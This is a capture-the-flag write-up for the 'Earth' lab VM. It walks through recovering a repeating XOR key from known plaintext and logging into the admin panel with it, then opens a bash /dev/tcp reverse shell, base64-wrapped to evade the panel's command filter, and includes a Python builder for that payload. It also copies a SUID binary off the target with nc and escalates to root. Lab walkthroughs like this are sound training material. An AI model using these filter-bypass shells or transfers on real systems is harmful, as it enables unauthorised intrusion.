Weekly Target Practice: The Planets: Earth

First download the VM, open it in VMware, select NAT networking and boot it.

Then run a host-discovery scan against the NAT subnet. It turns up 192.168.13.133 with ports 22, 80 and 443 open, so we browse to it.

Both port 80 and port 443 only return an error page, so we go back and run a full scan.

nmap -A 192.168.13.133 shows that the host is set up for name-based virtual hosting: the scan output lists the DNS names earth.local and terratest.earth.local (they appear in the TLS certificate on port 443). No wonder requests by IP came back 400: the server expects one of those hostnames in the Host header.

Next we add both hostnames to our local hosts file, pointing earth.local and terratest.earth.local at 192.168.13.133.

Then we visit the site by name at earth.local.

At the bottom of the page there are several hex strings listed under "Previous Messages:".

Next, a directory scan turns up an admin login page.

earth.local/admin/login asks for a username and password; a few weak credentials get nowhere.

Scanning the other hostname, terratest.earth.local, reveals a robots.txt.

robots.txt lists a disallowed entry whose extension is wildcarded; trying the .txt extension, the file is readable and contains:

Testing secure messaging system notes:

*Using XOR encryption as the algorithm, should be safe as used in RSA.

*Earth has confirmed they have received our sent messages.

*testdata.txt was used to test encryption.

*terra used as username for admin portal.

Todo:

*How do we send our monthly keys to Earth securely? Or should we change keys weekly?

*Need to test different key lengths to protect against bruteforce. How long should the key be?

*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.


That gives us new information: the cipher is XOR, a file testdata.txt was used to test the encryption, and the admin username is terra. First fetch testdata.txt and save it:

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

Now the Previous Messages come into play. Each message is plaintext XOR key, so XORing a message with its known plaintext (testdata.txt) gives back the key stream. Write a small Python script: pick one of the Previous Messages hex strings and XOR it with testdata.txt to recover the key.

import binascii

# Paste one of the "Previous Messages" hex strings from earth.local here
# (the value is elided on this page).
message_hex = "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"

testdata = "According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."

# ciphertext = plaintext XOR key, so ciphertext XOR plaintext = key stream.
ciphertext = binascii.a2b_hex(message_hex)
plaintext = testdata.encode()

# XOR byte by byte. zip() stops at the shorter input, which avoids the
# odd-length and misalignment problems of XORing the two values as big integers.
keystream = bytes(c ^ p for c, p in zip(ciphertext, plaintext))

print(keystream.decode(errors="replace"))

earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat

The output is "earthclimatechangebad4humans" repeated over and over: the messages are encrypted with a repeating-key XOR, and that key doubles as the admin password. Log in at https://earth.local/admin with username terra and password earthclimatechangebad4humans.
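The key-recovery step above generalises to any repeating-key XOR: once one plaintext is known, the key stream falls out, its shortest repeating unit is the key, and that key decrypts every other message encrypted under it. The following is an added example, not code from the original post; the ciphertexts in it are constructed here from a sample plaintext and the key recovered in the write-up, not copied from the target.

```python
"""Repeating-key XOR analysis (added example, not from the original post).

Given one ciphertext whose plaintext is known (testdata.txt on the box),
recover the key stream, find its shortest repeating unit, and use that key
to decrypt the other "Previous Messages". All sample data is constructed.
"""

KEY = b"earthclimatechangebad4humans"  # the key recovered in the write-up


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings; stops at the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def repeating_key_xor(data: bytes, key: bytes) -> bytes:
    """Encrypt or decrypt with a repeating key (XOR is its own inverse)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_keystream(ciphertext_hex: str, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack: ciphertext XOR plaintext = key stream."""
    return xor_bytes(bytes.fromhex(ciphertext_hex), known_plaintext)


def shortest_period(stream: bytes) -> bytes:
    """Smallest prefix that, repeated, reproduces the whole stream.

    If the known plaintext is shorter than the key, only a partial key is
    visible and the whole stream is returned unchanged.
    """
    n = len(stream)
    for p in range(1, n + 1):
        if all(stream[i] == stream[i % p] for i in range(n)):
            return stream[:p]
    return stream


def decrypt_with_key(ciphertext_hex: str, key: bytes) -> str:
    """Decrypt another message with the recovered key."""
    return repeating_key_xor(bytes.fromhex(ciphertext_hex), key).decode(
        "utf-8", errors="replace"
    )


# Constructed sample data standing in for testdata.txt and Previous Messages.
SAMPLE_PLAINTEXT = (
    b"According to radiometric dating estimation and other evidence, "
    b"Earth formed over 4.5 billion years ago."
)
MESSAGES_HEX = [
    repeating_key_xor(SAMPLE_PLAINTEXT, KEY).hex(),               # encrypts testdata
    repeating_key_xor(b"Next key rotation is due on Friday", KEY).hex(),
]

if __name__ == "__main__":
    stream = recover_keystream(MESSAGES_HEX[0], SAMPLE_PLAINTEXT)
    key = shortest_period(stream)
    print("recovered key:", key.decode())
    for m in MESSAGES_HEX[1:]:
        print("decrypted:", decrypt_with_key(m, key))
```

The "how long should the key be?" question in the notes is beside the point: a longer repeating key only raises the amount of known plaintext needed, and a single test message as long as the key gives it away completely.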

Now for a reverse shell. Running bash -i >& /dev/tcp/192.168.64.46/2500 0>&1 from the admin panel's command runner is refused: the panel reports that remote connections are forbidden.

In this situation you can either write a webshell to disk or encode the reverse-shell command so the filter does not see it; going by other write-ups, base64 gets around it. First base64-encode the command:

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY0LjQ2LzI1MDAgMD4mMQ==

The following command gets past the filter and the reverse shell connects back:

bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY0LjQ2LzI1MDAgMD4mMQ==}|{base64,-d}|{bash,-i}'

Bash brace expansion turns {echo,X} into echo X, so the submitted string has no whitespace inside the pipeline and the /dev/tcp address only appears after the base64 is decoded inside bash on the target.
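To make the trick repeatable for another listener address, here is an added example (not from the original post) that builds the wrapped one-liner, decodes it the way the target's bash would, and checks it against a stand-in filter. The filter is an assumption: the page only reports a "remote connections are forbidden" response, so the blocklist below (the /dev/tcp device and the attacker's subnet) is illustrative, not the panel's real check.

```python
"""Base64-wrapped reverse shell builder (added example, not from the post).

Assumption: the admin panel filters commands with a substring match on the
submitted text. The wrapped payload contains neither "/dev/tcp" nor the
attacker's address in clear text; bash reconstructs them after decoding.
"""
import base64
import shlex


def reverse_shell_cmd(lhost: str, lport: int) -> str:
    """The raw bash reverse shell that the panel rejects when sent as-is."""
    return f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"


def wrapped_payload(lhost: str, lport: int) -> str:
    """Base64-encode the command and wrap it in brace expansions.

    {echo,X} expands to `echo X`, {base64,-d} to `base64 -d`, and so on, so
    the pipeline carries no spaces and no sensitive strings.
    """
    b64 = base64.b64encode(reverse_shell_cmd(lhost, lport).encode()).decode()
    return f"bash -c '{{echo,{b64}}}|{{base64,-d}}|{{bash,-i}}'"


def decode_payload(payload: str) -> str:
    """What the target's bash ends up running: pull out and decode the base64."""
    pipeline = shlex.split(payload)[2]          # the single-quoted argument to -c
    b64 = pipeline.split("}|")[0][len("{echo,"):]
    return base64.b64decode(b64).decode()


def naive_filter_blocks(command: str, blocklist=("/dev/tcp", "192.168.")) -> bool:
    """Stand-in for the panel's filter (assumed substring blocklist)."""
    return any(bad in command for bad in blocklist)


if __name__ == "__main__":
    raw = reverse_shell_cmd("192.168.64.46", 2500)
    wrapped = wrapped_payload("192.168.64.46", 2500)
    print("raw blocked:    ", naive_filter_blocks(raw))
    print("wrapped blocked:", naive_filter_blocks(wrapped))
    print(wrapped)
```

Start the listener (nc -nlvp 2500) before submitting the printed command; decode_payload is only there to confirm the wrapper round-trips to the exact command you intended.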

Check whether Python is available, then upgrade to an interactive TTY: python3 -c 'import pty;pty.spawn("/bin/bash")'

Next, privilege escalation.

List SUID binaries: find / -perm -u=s -type f 2>/dev/null

One of them, /usr/bin/reset_root, is worth a look: the name alone ("reset root") is as clear a hint from the author as you could ask for.

The target has no debugging tools, so transfer the binary to our machine with nc and debug it there.

On the attacker: nc -nlvp 1234 > reset_root

On the target: nc 192.168.64.46 1234 < /usr/bin/reset_root

Run the binary under strace to see what it does before giving up.

It bails out because three files are missing, and they are missing on the target as well:

access("/dev/shm/kHgTFI5G", F_OK)      = -1 ENOENT (No such file or directory)

access("/dev/shm/Zw7bV9U5", F_OK)      = -1 ENOENT (No such file or directory)

access("/tmp/kcM0Wewe", F_OK)          = -1 ENOENT (No such file or directory)

So we create those three files on the target (empty files are enough).

Then run reset_root on the target again; this time it goes through and we are root.
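Reading the three paths off the strace output by eye works here, but a SUID binary may probe dozens of files, and the loader's own probes (such as /etc/ld.so.preload) look the same. The following added example (not from the original post) parses strace output for failed access() calls, keeps only the existence checks (F_OK) so loader probes are skipped, and prints the touch command to create them. The sample strace lines are the three from the write-up plus constructed loader lines.

```python
"""Pull the files a binary probes out of strace output (added example).

Sample lines are constructed: the three access() lines from the write-up
plus a loader probe and an execve line to show they are ignored.
"""
import re

# e.g. access("/tmp/kcM0Wewe", F_OK)          = -1 ENOENT (No such file or directory)
ACCESS_RE = re.compile(
    r'^(?:\[pid\s+\d+\]\s+)?'          # optional "[pid N]" prefix from strace -f
    r'access\("([^"]+)",\s*([A-Z_|]+)\)'  # path and mode
    r'\s*=\s*(-?\d+)'                   # return value
    r'(?:\s+(E[A-Z]+))?'                # errno name, if any
)


def missing_files(strace_output: str, modes=("F_OK",)) -> list:
    """Paths whose access() failed with ENOENT, in order, without duplicates.

    modes restricts the access() mode; None keeps every mode, which also
    returns loader probes such as /etc/ld.so.preload (R_OK).
    """
    found = []
    for line in strace_output.splitlines():
        m = ACCESS_RE.match(line.strip())
        if not m or m.group(4) != "ENOENT":
            continue
        path, mode = m.group(1), m.group(2)
        if modes is not None and mode not in modes:
            continue
        if path not in found:
            found.append(path)
    return found


def touch_command(paths: list) -> str:
    """Shell one-liner to create the probed files on the target."""
    return "touch " + " ".join(paths)


SAMPLE_STRACE = """\
execve("./reset_root", ["./reset_root"], 0x7ffd1e2c3d40 /* 20 vars */) = 0
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
access("/dev/shm/kHgTFI5G", F_OK)      = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK)      = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK)          = -1 ENOENT (No such file or directory)
"""

if __name__ == "__main__":
    paths = missing_files(SAMPLE_STRACE)
    print(touch_command(paths))
```

Pipe real output in with strace -f -e trace=access ./reset_root 2>&1 and feed it to missing_files; the F_OK filter is what separates the binary's own "does my marker file exist" checks from the loader's library probes.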

Grab the flag.
